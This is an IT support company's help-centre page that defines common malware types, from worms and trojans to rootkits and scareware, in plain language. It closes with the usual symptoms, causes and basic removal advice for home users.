Help Yourself Centre What is Malware?

What is Malware?

Virus Infection Triangle

Synopsis

Malware is the overall term given to a range of nasties including viruses, trojans, fake AV packages and pretty much anything that wants to hurt you or your machine in some way.

Description

Malware is a catch all phrase, which encompasses lots of genres, many which are very similar or overlapping and some 'packages' use a combination of them to spread. Here is a short glossary of common words used when talking about malware.

 

Payload

Most malware has a reason to exist and this is known as a 'payload' e.g. a virus infects your machine to install a trojan which will then allow someone outside to access your machine (the trojan in this case being the payload). A payload could be spyware, a spamming agent, a keylogger. Some payloads are designed specifically for individuals or very specific operating systems.

 

Worms

A Worm is a self replicating piece of software, it infects a machine and creates a copy which then infects another machine via the network - it needs no interaction from the user. One of the first worms, Morris, which hit the internet in 1988 was apparently not deliberate but written as a way to gauge the size of the internet. Firewalls and better security in the operating system has made worms much more unlikely now, but when the Morris worm hit the internet it caused network blackouts and blockages not because it meant to but because of the sheer amount of data being moved between computers trying to infect each other.

 

Viruses

Similar to worms, these are self replicating but they transmit differently. They normally infect files, which when accessed will cause the virus to run. The virus does the thing it was designed for (maybe dropping a trojan or turning your computer into a spambot - see below) and would also try to infect other files. Eventually, it may find its way into a file that is to be sent, emailed, copied to USB or otherwise accessed by another machine. At this point the process starts again.

 

Trojans

Trojans are payloads, the name is based on the Trojan Horse story as effectively it is granted access to your computer somehow (either using a virus or by you downloading it by mistake). Like the story, once inside they open ports, disable security settings, send packets of information onto the internet etc, allowing bad people to access your machine with ease.

 

Spyware

Spyware comes in two main forms, the first as a payload (either directly by virus/worm or drive-by-download). Secondly, spyware can be installed on your machine as part of another package. You may be installing a utility which has done a deal with a monitoring company to install their software at the same time, this is considered a grey legal area but most anti-virus packages will treat it is malware and remove it. The spyware monitors your surfing habits or your username and passwords etc and then either uses it to target advertising at you or hack into your accounts.

 

Adware

Adware is a piece of software that will show you popups, inject advertising into a web page. They often come hand in hand with spyware and are similar in the fact they can be installed by mistake (or without your knowledge).

 

Keyloggers

Keyloggers are a security related piece of malware. They monitor what you are typing and then send a packet of information off to a central location - for example, your username, password and pin are logged when you type them into a bank. The 3rd party will use them to access your account. They are very dangerous and you should contact your bank if one has been removed just in case.

 

Zombie / Spam Bots

A Zombie machine is created when malware has infected your machine and the payload uses your machine to spam (send advertising emails) to internet users and spread themselves to other machines. This is becoming a major issue on the internet with some botnets (a network of zombie machines) reaching millions of computers. Using encrypted pathways between them they can be used to launch attacks on websites by overwhelming the server with millions of simultaneous requests. These networks are normally used by organised crime (mafia etc).

 

Drive-By-Download

When you visit a website your computer is actually looking at various documents which are combined to make a nice looking page. Your computer must run scripts or programs to do this - a drive by download is when your computer opens the page and runs the script, but the script has been hijacked. When the script is run the computer downloads a payload (often a rogue antivirus) and installs it.

 

Rootkits

Rootkits are normally found in system files or in the boot sector of the harddrive. They are very difficult to remove. By infecting these parts of the operating system and computer, they are able to run before or early in the windows booting process. They are able to hide themselves from anti-virus packages as they effectively control the flow of data around the computer. Some rootkits are not able to be removed by reinstalling windows.

 

Rogue Antivirus or Scareware

This is the single biggest form of malware in the last few years.

 

Gallery:

AntiVir 2010 ScreenshotSecurity Tool Screenshot

Symptoms

Slow computer, crashing, lots of network or disk activity when not doing anything. You might get blatent advertising everytime you visit a website, or doing a search on google or bing returns porn or random rubbish.

Some malware just slows everything down or causes random problems but you might not even notice well written malware.

Causes

Historically, the biggest problems were via the network connection or via directly downloaded files (e.g. from sites). Now days, most malware comes in via websites that have either been hacked or are run by the bad guys - they place hidden code into the fabric of the page which causes you to install the malware (this is called drive by downloading). A lot of this can be prevented by not clicking on dodgy links, visiting porn sites or following any link that a non-friend has sent you, although, increasingly facebook accounts are being hacked and used to send known friends dodgy links).

Prognosis

Good! Most malware can be removed without any worry. Some are written deliberately to damage your operating system or cause as much difficulties as possible. These are not as frequent as now days most malware is money orientated and they need you to use the computer. Often it is the intercation of malware with other malware or anti-virus packages that cause trouble (like damaging your registry).

If you can, backup your files as soon as possible and scan the files with different antivirus packges before opening them on a new computer or you might spread the infection.

Treatment

Depending upon what sort of malware you have you might need to simply run a good quality anti-virus package. If its a nasty one, you may need to boot into safe mode or perform scans using the drive in a slave configuration. If you are reading this guide and you have tried the basic option, its time to visit a repair shop or a knowlegable friend.

You never need to lose data so don't fall for wiping your drive to remove the malware and some actually continue after a reinstall (root kit).

Comments or Questions?

Bookmark and Share

Hello! If you have any questions or comments about this item please leave a message.

Add A Comment!

Legal-ish: Comments are posted under a Creative Commons (Attribution-NoDerivs 3.0) licence. Comments by Totally Techy or a Techie are excluded and copyrighted. Links are out of our control, be careful!

Search Help Centre

You may login with either your assigned username or your e-mail address.
The password field is case sensitive.
Download IT Support Booklet
Copyright & Trademarks Totally Techy Ltd VAT 935 2893 93 & Reg. 6595441 Subject To Contract. E&OE
CompTIA Brigantia
Totally Techy Ltd
179 High Street, Uxbridge, Middlesex.
Phone: 0800 999 2150 Phone: 0330 999 1337
http://totallytechy.com

Check These Out:

reviews | D.I.Y | press | dotORG